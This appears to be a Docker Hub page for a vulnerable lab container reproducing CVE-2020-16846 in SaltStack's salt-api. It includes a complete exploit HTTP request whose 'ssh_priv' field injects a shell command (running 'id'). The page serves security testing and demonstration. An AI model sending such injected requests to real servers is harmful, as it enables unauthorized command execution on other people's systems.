The below command will start a container and run the salt-master and salt-api process. The salt-api service will be running on TCP/8000.
docker run -it transmissionator/cve-2020-16846 ./start
Send the below post to the target. Note you will need to specify your own IP address in the request.
POST /run HTTP/1.1
Host: <target address>:8000
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/json
Connection: Close
Content-Length: 118
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/tmp/test -l -q; id > /tmp/test \u0026 #"}
The above request will run the id command and send the output to /tmp/test
Content type
Image
Digest
Size
150.7 MB
Last updated
over 5 years ago
docker pull transmissionator/cve-2020-16846